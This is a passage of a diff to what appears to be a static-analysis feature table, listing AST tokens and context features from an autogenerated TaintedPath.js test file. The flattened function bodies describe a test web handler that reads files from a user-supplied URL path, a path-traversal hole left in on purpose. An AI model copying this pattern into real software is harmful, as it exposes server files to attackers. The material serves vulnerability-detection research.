true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:36:3:36:34 | res.wri ... (path)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:36:3:36:34 | res.wri ... (path)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:36:7:36:11 | write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:36:7:36:11 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:36:7:36:11 | write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:36:7:36:11 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:36:7:36:11 | write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:36:13:36:14 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:36:13:36:14 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:36:13:36:14 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:36:13:36:14 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:36:13:36:14 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:36:13:36:27 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:36:13:36:27 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:36:13:36:27 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:36:13:36:27 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:36:13:36:27 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:36:13:36:33 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:36:13:36:33 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:36:13:36:33 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:36:13:36:33 | exceptional return of fs.read ... c(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:36:13:36:33 | exceptional return of fs.read ... c(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:36:13:36:33 | fs.read ... c(path) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/TaintedPath.js:36:13:36:33 | fs.read ... c(path) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:36:13:36:33 | fs.read ... c(path) | contextFunctionInterfaces | views_local(req, res) | @@ -4875,6 +59190,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:36:13:36:33 | fs.read ... c(path) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:36:13:36:33 | fs.read ... c(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:36:13:36:33 | fs.read ... c(path) | receiverName | res | +| autogenerated/TaintedPath/TaintedPath.js:36:16:36:27 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:36:16:36:27 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:36:16:36:27 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:36:16:36:27 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:36:16:36:27 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:36:29:36:32 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:36:29:36:32 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:36:29:36:32 | path | calleeImports | fs | @@ -4884,6 +59204,61 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:36:29:36:32 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:36:29:36:32 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:36:29:36:32 | path | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:38:3:38:6 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:38:3:38:6 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:38:3:38:6 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:38:3:38:6 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:38:3:38:6 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:38:3:38:44 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:38:3:38:44 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:38:3:38:44 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:38:3:38:44 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:38:3:38:44 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:38:3:38:44 | path = ... ry.path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:38:3:38:44 | path = ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:38:3:38:44 | path = ... ry.path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:38:3:38:44 | path = ... ry.path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:38:3:38:44 | path = ... ry.path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:38:10:38:12 | url | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:38:10:38:12 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:38:10:38:12 | url | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:38:10:38:12 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:38:10:38:12 | url | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:38:10:38:18 | url.parse | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:38:10:38:18 | url.parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:38:10:38:18 | url.parse | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:38:10:38:18 | url.parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:38:10:38:18 | url.parse | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:38:10:38:33 | exceptional return of url.par ... , true) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:38:10:38:33 | exceptional return of url.par ... , true) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:38:10:38:33 | exceptional return of url.par ... , true) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:38:10:38:33 | exceptional return of url.par ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:38:10:38:33 | exceptional return of url.par ... , true) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:38:10:38:33 | url.par ... , true) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:38:10:38:33 | url.par ... , true) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:38:10:38:33 | url.par ... , true) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:38:10:38:33 | url.par ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:38:10:38:33 | url.par ... , true) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:38:10:38:39 | url.par ... ).query | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:38:10:38:39 | url.par ... ).query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:38:10:38:39 | url.par ... ).query | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:38:10:38:39 | url.par ... ).query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:38:10:38:39 | url.par ... ).query | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:38:10:38:44 | url.par ... ry.path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:38:10:38:44 | url.par ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:38:10:38:44 | url.par ... ry.path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:38:10:38:44 | url.par ... ry.path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:38:10:38:44 | url.par ... ry.path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:38:14:38:18 | parse | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:38:14:38:18 | parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:38:14:38:18 | parse | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:38:14:38:18 | parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:38:14:38:18 | parse | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:38:20:38:22 | req | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:38:20:38:22 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:38:20:38:22 | req | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:38:20:38:22 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:38:20:38:22 | req | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:38:20:38:26 | req.url | CalleeFlexibleAccessPath | url.parse | | autogenerated/TaintedPath/TaintedPath.js:38:20:38:26 | req.url | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:38:20:38:26 | req.url | calleeImports | url | @@ -4893,6 +59268,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:38:20:38:26 | req.url | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:38:20:38:26 | req.url | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:38:20:38:26 | req.url | receiverName | url | +| autogenerated/TaintedPath/TaintedPath.js:38:24:38:26 | url | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:38:24:38:26 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:38:24:38:26 | url | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:38:24:38:26 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:38:24:38:26 | url | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:38:29:38:32 | true | CalleeFlexibleAccessPath | url.parse | | autogenerated/TaintedPath/TaintedPath.js:38:29:38:32 | true | InputArgumentIndex | 1 | | autogenerated/TaintedPath/TaintedPath.js:38:29:38:32 | true | calleeImports | url | @@ -4902,6 +59282,56 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:38:29:38:32 | true | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:38:29:38:32 | true | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:38:29:38:32 | true | receiverName | url | +| autogenerated/TaintedPath/TaintedPath.js:38:35:38:39 | query | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:38:35:38:39 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:38:35:38:39 | query | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:38:35:38:39 | query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:38:35:38:39 | query | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:38:41:38:44 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:38:41:38:44 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:38:41:38:44 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:38:41:38:44 | path | enclosingFunctionName | http.createServer#functionalargument | +| 